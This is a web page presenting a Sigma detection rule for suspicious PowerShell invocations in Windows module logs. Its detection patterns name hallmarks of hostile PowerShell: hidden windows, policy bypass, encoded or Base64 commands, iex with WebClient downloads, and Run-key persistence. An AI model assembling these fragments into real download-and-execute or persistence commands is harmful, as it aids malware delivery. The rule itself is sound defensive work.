Suspicious PowerShell Invocations - Specific - PowerShell Module

calendar May 12, 2025 · attack.execution attack.t1059.001  ·
Share on: linkedin copy

Detects suspicious PowerShell invocation command parameters

Sigma rule (View on GitHub)

 1title: Suspicious PowerShell Invocations - Specific - PowerShell Module
 2id: 8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090
 3related:
 4    - id: fce5f582-cc00-41e1-941a-c6fabf0fdb8c
 5      type: obsolete
 6    - id: ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71
 7      type: similar
 8    - id: 536e2947-3729-478c-9903-745aaffe60d2
 9      type: similar
10status: test
11description: Detects suspicious PowerShell invocation command parameters
12references:
13    - Internal Research
14    - https://github.com/HackTricks-wiki/hacktricks/blob/e4c7b21b8f36c97c35b7c622732b38a189ce18f7/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md
15author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro
16date: 2017-03-05
17modified: 2025-02-17
18tags:
19    - attack.execution
20    - attack.t1059.001
21logsource:
22    product: windows
23    category: ps_module
24    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b
25detection:
26    selection_convert_b64:
27        ContextInfo|contains|all:
28            - '-nop'
29            - ' -w '
30            - 'hidden'
31            - ' -c '
32            - '[Convert]::FromBase64String'
33    selection_iex:
34        ContextInfo|contains|all:
35            - ' -w '
36            - 'hidden'
37            - '-noni'
38            - '-nop'
39            - ' -c '
40            - 'iex'
41            - 'New-Object'
42    selection_enc:
43        ContextInfo|contains|all:
44            - ' -w '
45            - 'hidden'
46            - '-ep'
47            - 'bypass'
48            - '-Enc'
49    selection_reg:
50        ContextInfo|contains|all:
51            - 'powershell'
52            - 'reg'
53            - 'add'
54        ContextInfo|contains:
55            - '\software\microsoft\windows\currentversion\run'
56            - '\software\wow6432node\microsoft\windows\currentversion\run'
57            - '\software\microsoft\windows\currentversion\policies\explorer\run'
58    selection_webclient:
59        ContextInfo|contains|all:
60            - 'bypass'
61            - '-noprofile'
62            - '-windowstyle'
63            - 'hidden'
64            - 'new-object'
65            - 'system.net.webclient'
66            - '.download'
67    selection_iex_webclient:
68        ContextInfo|contains|all:
69            - 'iex'
70            - 'New-Object'
71            - 'Net.WebClient'
72            - '.Download'
73    filter_chocolatey:
74        ContextInfo|contains:
75            - "(New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1"
76            - 'Write-ChocolateyWarning'
77    condition: 1 of selection_* and not 1 of filter_*
78falsepositives:
79    - Unknown
80level: high

References

Related rules

to-top